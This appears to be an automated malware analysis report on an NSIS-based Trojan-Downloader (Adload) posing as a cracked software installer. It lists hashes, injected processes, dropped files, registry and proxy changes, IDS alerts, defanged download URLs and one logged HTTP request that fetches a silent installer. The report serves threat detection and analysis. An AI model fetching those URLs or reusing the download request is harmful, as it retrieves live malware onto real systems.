Gen.Variant.Strictor.117797_10df3146c0
Gen:Variant.Strictor.117797 (BitDefender), TrojanDownloader:Win32/Adload.DP!bit (Microsoft), Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.Vittalia.7648 (DrWeb), Gen:Variant.Strictor.117797 (B) (Emsisoft), Gen:Variant.Strictor.117797 (FSecure), Win32:PUP-gen [PUP] (Avast), Gen:Variant.Strictor.117797 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, PUP
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 10df3146c0a7ee856b3a28aeab05763b
SHA1: e6a4379d914bb02b06c6b8762aa56ef715e73e8a
SHA256: 6383f6d5e086af1852fdbabf0de234d49b87f1d4a93fa5b7d14332422b474aa2
SSDeep: 49152:QqMbqd2g0pVv7eZ8Z8ZMzfGKnJM40OH5n:QQ30pllz9bn
Size: 1746052 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Setup__2140_il2.exe:292
LF4X4VJWFp.exe:2880
cpSetup.exe:1852
The Trojan injects its code into the following process(es):
Setup__2140_il2.exe:192
%original file name%.exe:2012
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Setup__2140_il2.exe:292 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\main[1].htm (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A2LCUZKZ.txt (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1V9Q60HH.txt (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (6539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\amipb[1].htm (272 bytes)
The process Setup__2140_il2.exe:192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (7551 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\amipb[1].htm (271 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\main[1].htm (272 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\main[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\amipb[1].htm (0 bytes)
The process %original file name%.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\586abfc3362cc[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\System.dll (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\U6cgvnDPb5 (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (192 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss2BE0.tmp (0 bytes)
The process LF4X4VJWFp.exe:2880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A0B.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\cpSetup.exe (93723 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe (58164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\706703874 (974 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\open.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\706703874 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd49FB.tmp (0 bytes)
The process cpSetup.exe:1852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
Registry activity
The process Setup__2140_il2.exe:292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"
[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"
[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "B0 B0 50 65 7D 65 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
[HKCR\vinyls.tramell.1]
[HKCR\vinyls.tramell\CurVer]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Programmable]
[HKCR\vinyls.tramell.1\CLSID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
[HKCR\vinyls.tramell]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable"
The process Setup__2140_il2.exe:192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"
[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"
[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "B0 B0 50 65 7D 65 D2 01"
[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process %original file name%.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "00 0F D0 64 7D 65 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASAPI32]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "00 0F D0 64 7D 65 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\10df3146c0a7ee856b3a28aeab05763b_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process cpSetup.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1483361216"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "B0 B0 50 65 7D 65 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 39 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
| MD5 | File path |
|---|---|
| 45feac6677930552a91ea5e07b22525b | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\586abfc3362cc[1].exe |
| 7caaf58a526da33c24cbe122e7839693 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll |
| c2c978b4b608c45c6bf61d68cdedaa0e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe |
| 89d40ecddf3ce6f3b0e6a84f40936912 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\nsArray.dll |
| 45feac6677930552a91ea5e07b22525b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe |
| c17103ae9072a06da581dec998343fc1 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\System.dll |
| c498ae64b4971132bba676873978de1e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\inetc.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 233472 | 28056 | 28160 | 2.91371 | 1acd00482b089543b3dce3f299e3210a |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=11671248&pid=2735&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4zLjY3MSBNdWx0aWxpbmd1YWwgKyBMaWNlbnNlIEtleXMgKyBQb3J0YWJsZQ==&b_typ=pe | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable | |
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4z&reb=1&ic= | |
| hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
| hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css | |
| hxxp://cdn2.leadingdownload.com/V38/amipb.js | |
| hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
| hxxp://www.secularistsarakolet.site/index.php | |
| hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=11671248&b_typ=pe&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4z&reb=1&ic= | |
| hxxp://jump.meunidealized.bid/stub_maker.php?program=sevenzip&tid=11671248&pid=2735&b_typ=pe&reb=1&name=Advanced SystemCare Pro 10.0.3.671 Multilingual + License Keys + Portable | |
| hxxp://cdn1.leadingdownload.com/V38/amipb.js | |
| hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=11671248&pid=2735&n=QWR2YW5jZWQgU3lzdGVtQ2FyZSBQcm8gMTAuMC4zLjY3MSBNdWx0aWxpbmd1YWwgKyBMaWNlbnNlIEtleXMgKyBQb3J0YWJsZQ==&b_typ=pe | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE SoundCloud Downloader Install Beacon
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
